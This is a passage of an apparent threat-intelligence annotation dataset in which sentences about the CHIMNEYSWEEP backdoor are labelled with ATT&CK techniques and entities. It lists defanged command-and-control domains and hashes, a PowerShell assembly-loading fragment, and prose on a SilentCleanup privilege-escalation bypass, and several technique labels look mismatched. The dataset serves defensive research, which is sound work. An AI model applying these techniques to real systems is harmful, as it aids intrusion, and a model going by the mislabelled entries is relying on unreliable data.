servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nAppxProviders.dll (MD5: 7f6db4493c6a76eb44534306291ea85f)\nCHIMNEYSWEEP backdoor\nCompile time: 2021/07/26 13:39:17", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "CHIMNEYSWEEP backdoor variant with updated C&C servers and DLL hash", "entities": [ { "text": "CHIMNEYSWEEP backdoor", "start": 125, "end": 146, "label": "MalwareTool" }, { "text": "telegram-update[.]com", "start": 13, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "avira.ltd", "start": 35, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "windowsupadates[.]com", "start": 45, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "AppxProviders.dll (MD5: 7f6db4493c6a76eb44534306291ea85f)", "start": 67, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "Compile time: 2021/07/26 13:39:17", "start": 147, "end": 180, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s78-db707d", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nAppxProviders.dll (MD5: 7f6db4493c6a76eb44534306291ea85f)\nCHIMNEYSWEEP backdoor\nCompile time: 2021/07/26 13:39:17", "sentence_text": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nAppxProviders.dll (MD5: 3a1033cb1eb06c2cd5e91c539cf8a519)\nCHIMNEYSWEEP backdoor\nCompile time: 2021/07/26 13:39:17", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "CHIMNEYSWEEP backdoor with consistent C&C servers and updated DLL hash", "entities": [ { "text": "CHIMNEYSWEEP backdoor", "start": 125, "end": 146, "label": "MalwareTool" }, { "text": "telegram-update[.]com", "start": 13, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "avira.ltd", "start": 35, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "windowsupadates[.]com", "start": 45, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "AppxProviders.dll (MD5: 3a1033cb1eb06c2cd5e91c539cf8a519)", "start": 67, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "Compile time: 2021/07/26 13:39:17", "start": 147, "end": 180, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s79-b4ff5b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nAppxProviders.dll (MD5: 3a1033cb1eb06c2cd5e91c539cf8a519)\nCHIMNEYSWEEP backdoor\nCompile time: 2021/07/26 13:39:17", "sentence_text": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nUNAVAILABLE (MD5: 23643b7bd48a200889a4613a0e0a86e4)\nCHIMNEYSWEEP backdoor\nInstalled by: UNAVAILABLE (MD5: 49d72f9212d5653f5be9f764d8c9df24)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "CHIMNEYSWEEP backdoor with consistent C&C servers and unavailable component hashes", "entities": [ { "text": "CHIMNEYSWEEP backdoor", "start": 119, "end": 140, "label": "MalwareTool" }, { "text": "telegram-update[.]com", "start": 13, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "avira.ltd", "start": 35, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "windowsupadates[.]com", "start": 45, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "UNAVAILABLE (MD5: 23643b7bd48a200889a4613a0e0a86e4)", "start": 67, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "Installed by: UNAVAILABLE (MD5: 49d72f9212d5653f5be9f764d8c9df24)", "start": 141, "end": 206, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s80-43fca5", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nUNAVAILABLE (MD5: 23643b7bd48a200889a4613a0e0a86e4)\nCHIMNEYSWEEP backdoor\nInstalled by: UNAVAILABLE (MD5: 49d72f9212d5653f5be9f764d8c9df24)", "sentence_text": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nUNAVAILABLE (MD5: 9c09d147dfbc98d5e6e051fe1ed0033d)\nCHIMNEYSWEEP backdoor\nInstalled by unpack.exe (MD5: 38e0fa41e9519d4783766992c203e794)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "CHIMNEYSWEEP backdoor variant with unpack.exe installer and updated hashes", "entities": [ { "text": "CHIMNEYSWEEP backdoor", "start": 119, "end": 140, "label": "MalwareTool" }, { "text": "telegram-update[.]com", "start": 13, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "avira.ltd", "start": 35, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "windowsupadates[.]com", "start": 45, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "UNAVAILABLE (MD5: 9c09d147dfbc98d5e6e051fe1ed0033d)", "start": 67, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "Installed by unpack.exe (MD5: 38e0fa41e9519d4783766992c203e794)", "start": 141, "end": 204, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s81-83da01", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nUNAVAILABLE (MD5: 9c09d147dfbc98d5e6e051fe1ed0033d)\nCHIMNEYSWEEP backdoor\nInstalled by unpack.exe (MD5: 38e0fa41e9519d4783766992c203e794)", "sentence_text": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nUNAVAILABLE (MD5: 5cc183702fae8cc23a55037c1efab5e5)\nCHIMNEYSWEEP backdoor\nInstalled by UNAVAILABLE (MD5: 92c61e3047297136701c25deb658b35a)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "CHIMNEYSWEEP backdoor variant with consistent C&C and updated unavailable hashes", "entities": [ { "text": "CHIMNEYSWEEP backdoor", "start": 119, "end": 140, "label": "MalwareTool" }, { "text": "telegram-update[.]com", "start": 13, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "avira.ltd", "start": 35, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "windowsupadates[.]com", "start": 45, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "UNAVAILABLE (MD5: 5cc183702fae8cc23a55037c1efab5e5)", "start": 67, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "Installed by UNAVAILABLE (MD5: 92c61e3047297136701c25deb658b35a)", "start": 141, "end": 205, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s82-f33ad2", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nUNAVAILABLE (MD5: 5cc183702fae8cc23a55037c1efab5e5)\nCHIMNEYSWEEP backdoor\nInstalled by UNAVAILABLE (MD5: 92c61e3047297136701c25deb658b35a)", "sentence_text": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nssv.dll (MD5: 77a369e5e49e7e62d8eef2c00cd02950)\nCHIMNEYSWEEP backdoor\nCompile time: 2018/10/08 17:28:39 C&C servers:\ncloud-avira[.]com\npgp.eu[.]com\nserver-avira[.]com\nskype.se[.]net\nuk2privat[.]com\nupdate-pgp[.]com\nExecution\nAfter being dropped by the dropper, the installer is executed.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "CHIMNEYSWEEP backdoor variants with expanded C&C infrastructure and execution chain", "entities": [ { "text": "CHIMNEYSWEEP backdoor", "start": 115, "end": 136, "label": "MalwareTool" }, { "text": "Execution\nAfter being dropped by the dropper, the installer is executed.", "start": 282, "end": 354, "label": "Action" }, { "text": "telegram-update[.]com", "start": 13, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "avira.ltd", "start": 35, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "windowsupadates[.]com", "start": 45, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "ssv.dll (MD5: 77a369e5e49e7e62d8eef2c00cd02950)", "start": 67, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "Compile time: 2018/10/08 17:28:39 C&C servers:", "start": 137, "end": 183, "label": "Infrastructure_Indicator" }, { "text": "cloud-avira[.]com", "start": 184, "end": 201, "label": "Infrastructure_Indicator" }, { "text": "pgp.eu[.]com", "start": 202, "end": 214, "label": "Infrastructure_Indicator" }, { "text": "server-avira[.]com", "start": 215, "end": 233, "label": "Infrastructure_Indicator" }, { "text": "skype.se[.]net", "start": 234, "end": 248, "label": "Infrastructure_Indicator" }, { "text": "uk2privat[.]com", "start": 249, "end": 264, "label": "Infrastructure_Indicator" }, { "text": "update-pgp[.]com", "start": 265, "end": 281, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s83-3eb027", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "C&C servers:\ntelegram-update[.]com\navira.ltd\nwindowsupadates[.]com\nssv.dll (MD5: 77a369e5e49e7e62d8eef2c00cd02950)\nCHIMNEYSWEEP backdoor\nCompile time: 2018/10/08 17:28:39 C&C servers:\ncloud-avira[.]com\npgp.eu[.]com\nserver-avira[.]com\nskype.se[.]net\nuk2privat[.]com\nupdate-pgp[.]com\nExecution\nAfter being dropped by the dropper, the installer is executed.", "sentence_text": "The installer initially drops the payload as “m.d” in the covert store (\"C:\\ProgramData\\Microsoft Installer{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}\\Force\").", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1564.001", "name": "Hidden Files and Directories" } ], "procedure": "CHIMNEYSWEEP installer drops payload to covert ProgramData directory with GUID path", "entities": [ { "text": "drops the payload as", "start": 24, "end": 44, "label": "Action" }, { "text": "C:\\ProgramData\\Microsoft Installer{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}\\Force", "start": 73, "end": 151, "label": "Infrastructure_Indicator" }, { "text": "m.d", "start": 46, "end": 49, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s84-0251cb", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "The installer initially drops the payload as “m.d” in the covert store (\"C:\\ProgramData\\Microsoft Installer{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}\\Force\").", "sentence_text": "Some of the installers forge the dropped file’s CreationTime, LastAccessTime, and LastWrite time from C:\\Windows\\System32\\smss.exe", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "CHIMNEYSWEEP installers forge file timestamps using smss.exe timestamps", "entities": [ { "text": "forge the dropped file’s CreationTime, LastAccessTime, and LastWrite time", "start": 23, "end": 96, "label": "Action" }, { "text": "C:\\Windows\\System32\\smss.exe", "start": 102, "end": 130, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s85-94f99b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "Some of the installers forge the dropped file’s CreationTime, LastAccessTime, and LastWrite time from C:\\Windows\\System32\\smss.exe", "sentence_text": "The installer then executes the “Alloc” export which checks whether the device is currently running DeepFreeze by Faronics , although this is not applicable for the samples analysed by Mandiant.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Execute the 'Alloc' export and check whether the system is running DeepFreeze.", "entities": [ { "text": "executes the “Alloc” export", "start": 19, "end": 46, "label": "Action" }, { "text": "checks whether the device is currently running DeepFreeze by Faronics", "start": 53, "end": 122, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s86-c3cf60", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "The installer then executes the “Alloc” export which checks whether the device is currently running DeepFreeze by Faronics , although this is not applicable for the samples analysed by Mandiant.", "sentence_text": "If the process name contains “creensaver.”, the backdoor will write the image to %SYSTEM32%\\Slui and then execute a task named \"\\\\Microsoft\\\\Windows\\\\License Manager\\\\LicenseExchange\\\".", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "CHIMNEYSWEEP backdoor screensaver detection with scheduled task execution", "entities": [ { "text": "write the image to %SYSTEM32%\\Slui", "start": 62, "end": 96, "label": "Action" }, { "text": "execute a task named \"\\\\Microsoft\\\\Windows\\\\License Manager\\\\LicenseExchange\\", "start": 106, "end": 183, "label": "Action" }, { "text": "creensaver", "start": 30, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "%SYSTEM32%\\Slui", "start": 81, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "\\\\Microsoft\\\\Windows\\\\License Manager\\\\LicenseExchange\\", "start": 128, "end": 183, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s87-6ff43a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 87, "context_before": "If the process name contains “creensaver.”, the backdoor will write the image to %SYSTEM32%\\Slui and then execute a task named \"\\\\Microsoft\\\\Windows\\\\License Manager\\\\LicenseExchange\\\".", "sentence_text": "Alloc ultimately calls the Control_Provider export, which will initiate the backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "CHIMNEYSWEEP Alloc export calls Control_Provider to initiate backdoor", "entities": [ { "text": "Alloc ultimately calls the Control_Provider export", "start": 0, "end": 50, "label": "Action" }, { "text": "initiate the backdoor.", "start": 63, "end": 85, "label": "Action" }, { "text": "Control_Provider export", "start": 27, "end": 50, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s88-d0a313", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "Alloc ultimately calls the Control_Provider export, which will initiate the backdoor.", "sentence_text": "The main functionality is provided in the next export called by the installer, “RatingSetupUI”.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "CHIMNEYSWEEP installer calls RatingSetupUI export for main functionality", "entities": [ { "text": "called by the installer, “RatingSetupUI”.", "start": 54, "end": 95, "label": "Action" }, { "text": "main functionality is provided ", "start": 4, "end": 35, "label": "Action" }, { "text": "RatingSetupUI", "start": 80, "end": 93, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s89-2dc28b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "The main functionality is provided in the next export called by the installer, “RatingSetupUI”.", "sentence_text": "This export is responsible for all the command-and-control (C&C) interactions and backdoor capabilities.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "RatingSetupUI export handles all C&C interactions and backdoor capabilities", "entities": [ { "text": "responsible for all the command-and-control (C&C) interactions ", "start": 15, "end": 78, "label": "Action" }, { "text": "backdoor capabilities.", "start": 82, "end": 104, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s90-8ba128", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "This export is responsible for all the command-and-control (C&C) interactions and backdoor capabilities.", "sentence_text": "The last two exports are related to the update process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s91-b63ca9", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "The last two exports are related to the update process.", "sentence_text": "“Control_Provider” manages the update process whereas “Telephon” executes the “Control_Provider” function.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Control_Provider manages update process while Telephon executes it", "entities": [ { "text": "Control_Provider", "start": 1, "end": 17, "label": "Infrastructure_Indicator" }, { "text": "manages the update process ", "start": 19, "end": 46, "label": "Action" }, { "text": "Telephon", "start": 55, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "executes the “Control_Provider” function", "start": 65, "end": 105, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s92-a2a48e", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "“Control_Provider” manages the update process whereas “Telephon” executes the “Control_Provider” function.", "sentence_text": "If the backdoor is not running as an administrator, the backdoor may use embedded payloads to escalate privileges.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "CHIMNEYSWEEP backdoor uses embedded payloads for privilege escalation when not running as administrator", "entities": [ { "text": " use embedded payloads to escalate privileges.", "start": 68, "end": 114, "label": "Action" }, { "text": "not running as an administrator", "start": 19, "end": 50, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s93-8a37d6", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "If the backdoor is not running as an administrator, the backdoor may use embedded payloads to escalate privileges.", "sentence_text": "A mutex named “rerunadmn” is used internally by the backdoor and the two RC4 encrypted payloads are extracted.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "CHIMNEYSWEEP backdoor uses rerunadmn mutex and extracts RC4 encrypted payloads", "entities": [ { "text": "backdoor", "start": 52, "end": 60, "label": "MalwareTool" }, { "text": "mutex named “rerunadmn”", "start": 2, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "two RC4 encrypted payloads are extracted.", "start": 69, "end": 110, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s94-57b9ab", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "A mutex named “rerunadmn” is used internally by the backdoor and the two RC4 encrypted payloads are extracted.", "sentence_text": "The first payload is a .NET loader, which loads the second payload and calls the type \"vjp5ZPP9AidVjXxofy\" and method \"s7tajdxvX”.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": ".NET loader payload loads secondary payload and executes specific type/method", "entities": [ { "text": ".NET loader", "start": 23, "end": 34, "label": "MalwareTool" }, { "text": "loads the second payload", "start": 42, "end": 66, "label": "Action" }, { "text": "calls the type \"vjp5ZPP9AidVjXxofy\" and method \"s7tajdxvX”.", "start": 71, "end": 130, "label": "Action" }, { "text": "vjp5ZPP9AidVjXxofy", "start": 87, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "s7tajdxvX", "start": 119, "end": 128, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s95-9a3978", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "The first payload is a .NET loader, which loads the second payload and calls the type \"vjp5ZPP9AidVjXxofy\" and method \"s7tajdxvX”.", "sentence_text": "The loader (MD5:\n779940f675ff4ab4e8cab7a1b7cf5d3c\n) will first enumerate the loaded .NET modules looking for the above class and methods.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": ".NET loader enumerates modules to find specific class and methods", "entities": [ { "text": " loaded .NET modules", "start": 76, "end": 96, "label": "MalwareTool" }, { "text": "779940f675ff4ab4e8cab7a1b7cf5d3c", "start": 17, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "enumerate the loaded .NET modules", "start": 63, "end": 96, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s96-b3bf47", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "The loader (MD5:\n779940f675ff4ab4e8cab7a1b7cf5d3c\n) will first enumerate the loaded .NET modules looking for the above class and methods.", "sentence_text": "If they exist, it will execute that module.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s97-db4ae6", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "If they exist, it will execute that module.", "sentence_text": "If the module is not loaded, the assembly is loaded and then executed in memory.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Loader loads and executes assembly in memory if module not found", "entities": [ { "text": "module ", "start": 7, "end": 14, "label": "MalwareTool" }, { "text": "assembly is loaded and then executed in memory.", "start": 33, "end": 80, "label": "Action" }, { "text": "module is not loaded", "start": 7, "end": 27, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s98-0740fb", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "If the module is not loaded, the assembly is loaded and then executed in memory.", "sentence_text": "The backdoor will then pass through the string “AD” if the payload is already executing as Administrator or the path to a temporary file on disk, directly to the loaded .net module.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1134", "name": "Access Token Manipulation" } ], "procedure": "Backdoor passes privilege status or temp file path to loaded .NET module", "entities": [ { "text": "backdoor", "start": 4, "end": 12, "label": "MalwareTool" }, { "text": "AD", "start": 48, "end": 50, "label": "Infrastructure_Indicator" }, { "text": "temporary file", "start": 122, "end": 136, "label": "Infrastructure_Indicator" }, { "text": " pass through the string “AD” if the payload is already executing as Administrator", "start": 22, "end": 104, "label": "Action" }, { "text": " path to a temporary file on disk", "start": 111, "end": 144, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s99-9861b1", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "The backdoor will then pass through the string “AD” if the payload is already executing as Administrator or the path to a temporary file on disk, directly to the loaded .net module.", "sentence_text": "This temporary file is created by writing the content of the Software\\AppDataLoad\\GLX\\aex and writing the content to the Windows %TEMP% directory with the name APPX..tmp.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Backdoor creates temporary file from registry content with random name", "entities": [ { "text": "Windows %TEMP% directory", "start": 121, "end": 145, "label": "Infrastructure_Indicator" }, { "text": "APPX..tmp.", "start": 160, "end": 185, "label": "Infrastructure_Indicator" }, { "text": "Software\\AppDataLoad\\GLX\\aex", "start": 61, "end": 89, "label": "Infrastructure_Indicator" }, { "text": " temporary file is created ", "start": 4, "end": 31, "label": "Action" }, { "text": "writing the content of the Software\\AppDataLoad\\GLX\\aex and writing the content to the Windows %TEMP% directory ", "start": 34, "end": 146, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s100-6ee5ec", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "This temporary file is created by writing the content of the Software\\AppDataLoad\\GLX\\aex and writing the content to the Windows %TEMP% directory with the name APPX..tmp.", "sentence_text": "This file is a copy of the backdoor itself.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Temporary file contains copy of backdoor executable", "entities": [ { "text": "backdoor", "start": 27, "end": 35, "label": "MalwareTool" }, { "text": "file is a copy of the backdoor itself.", "start": 5, "end": 43, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s102-f6267b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 102, "context_before": "[Reflection.", "sentence_text": "Assembly]::LoadFile(\\\"%s\\\")\\n$i=\\\"\\\"\\n$r=[%s]::%s(\\\"%s\\\",[ref]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s103-1ebb0a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 103, "context_before": "Assembly]::LoadFile(\\\"%s\\\")\\n$i=\\\"\\\"\\n$r=[%s]::%s(\\\"%s\\\",[ref]", "sentence_text": "$i)\\necho $r,$i\\n Execution will then proceed within the second payload (MD5:\n3633b3d69060a5882656b69f81655f0a\n), responsible for ensuring that the payload is running with administrator privileges.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1134", "name": "Access Token Manipulation" } ], "procedure": "Second payload ensures administrator privilege execution with specific MD5 hash", "entities": [ { "text": "second payload", "start": 57, "end": 71, "label": "MalwareTool" }, { "text": "3633b3d69060a5882656b69f81655f0a", "start": 78, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "ensuring that the payload is running with administrator privileges.", "start": 130, "end": 197, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s104-aa66c2", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 104, "context_before": "$i)\\necho $r,$i\\n Execution will then proceed within the second payload (MD5:\n3633b3d69060a5882656b69f81655f0a\n), responsible for ensuring that the payload is running with administrator privileges.", "sentence_text": "This payload is obfuscated by reactor and contains encrypted strings used throughout the execution.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Payload obfuscated by reactor with encrypted strings", "entities": [ { "text": "payload", "start": 5, "end": 12, "label": "MalwareTool" }, { "text": "obfuscated by reactor", "start": 16, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "encrypted strings", "start": 51, "end": 68, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s105-6633f6", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 105, "context_before": "This payload is obfuscated by reactor and contains encrypted strings used throughout the execution.", "sentence_text": "Upon execution, the payload will create the mutex “rerunadmn” and “subttoadmn”.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "Execute payload to create mutexes for controlling or tracking execution instances", "entities": [ { "text": "create the mutex", "start": 33, "end": 49, "label": "Action" }, { "text": "rerunadmn", "start": 51, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "subttoadmn", "start": 67, "end": 77, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s106-4b6b59", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 106, "context_before": "Upon execution, the payload will create the mutex “rerunadmn” and “subttoadmn”.", "sentence_text": "The module utilises the following techniques to execute the payload as administrator:\nMakes use of the Windows “SilentCleanup” scheduled task.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "Payload uses Windows SilentCleanup scheduled task for privilege escalation", "entities": [ { "text": "payload ", "start": 60, "end": 68, "label": "MalwareTool" }, { "text": "use of the Windows “SilentCleanup” scheduled task.", "start": 92, "end": 142, "label": "Infrastructure_Indicator" }, { "text": "execute the payload as administrator", "start": 48, "end": 84, "label": "Action" }, { "text": "“SilentCleanup” scheduled task.", "start": 111, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s107-e5f0b8", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 107, "context_before": "The module utilises the following techniques to execute the payload as administrator:\nMakes use of the Windows “SilentCleanup” scheduled task.", "sentence_text": "This task executes the executable running in %windir%\\system32\\cleanmgr.exe, and the payload uses the Windows Registry Environment key to change the %windir% variable to point to c:\\Windows.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1546.013", "name": "PowerShell Profile" } ], "procedure": "Payload hijacks SilentCleanup task by modifying %windir% registry environment variable", "entities": [ { "text": "payload", "start": 85, "end": 92, "label": "MalwareTool" }, { "text": "uses the Windows Registry Environment key to change the %windir% variable", "start": 93, "end": 166, "label": "Action" }, { "text": "%windir%\\system32\\cleanmgr.exe", "start": 45, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "c:\\Windows.", "start": 179, "end": 190, "label": "Infrastructure_Indicator" }, { "text": "Windows Registry Environment key", "start": 102, "end": 134, "label": 